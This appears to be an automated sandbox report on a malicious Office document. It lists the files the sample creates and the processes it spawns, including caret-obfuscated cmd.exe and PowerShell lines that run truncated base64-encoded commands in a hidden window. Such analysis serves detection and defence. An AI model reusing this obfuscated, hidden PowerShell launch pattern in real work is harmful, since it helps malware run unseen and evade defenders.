Technical Information
Malicious functions
Executes the following (exploit)
- '<SYSTEM32>\cmd.exe' /c pO^w^ERs^He^LL -e WwBzAFkAcwBUAGUAbQAuAHQARQBYAFQALgBlAE4AYwBvAGQASQBOAGcAXQA6ADoAdQBuAEkAYwBvAEQAZQAuAGcAZQB0AFMAdABSAEkAbgBnACgAWwBTAHkAcwB0AGUATQAuAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8ATQBi...
Modifies file system
Creates the following files
- %LOCALAPPDATA%\microsoft\windows\<INETFILES>\content.word\~wrf{8c32a4f3-fe94-429f-9c8a-fee0e591ac25}.tmp
Miscellaneous
Creates and executes the following
- '<SYSTEM32>\cmd.exe' /c pO^w^ERs^He^LL -e WwBzAFkAcwBUAGUAbQAuAHQARQBYAFQALgBlAE4AYwBvAGQASQBOAGcAXQA6ADoAdQBuAEkAYwBvAEQAZQAuAGcAZQB0AFMAdABSAEkAbgBnACgAWwBTAHkAcwB0AGUATQAuAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8ATQBi...' (with hidden window)
Executes the following
- '%ProgramFiles%\microsoft office\office14\excel.exe' -Embedding
- '<SYSTEM32>\windowspowershell\v1.0\powershell.exe' -e WwBzAFkAcwBUAGUAbQAuAHQARQBYAFQALgBlAE4AYwBvAGQASQBOAGcAXQA6ADoAdQBuAEkAYwBvAEQAZQAuAGcAZQB0AFMAdABSAEkAbgBnACgAWwBTAHkAcwB0AGUATQAuAEMAbwBuAFYAZQBSAHQAXQA6ADoARgBSAE8ATQBiAEEAUwBFADYANABTAF...
- '%ProgramFiles%\microsoft office\office14\excelcnv.exe' -Embedding
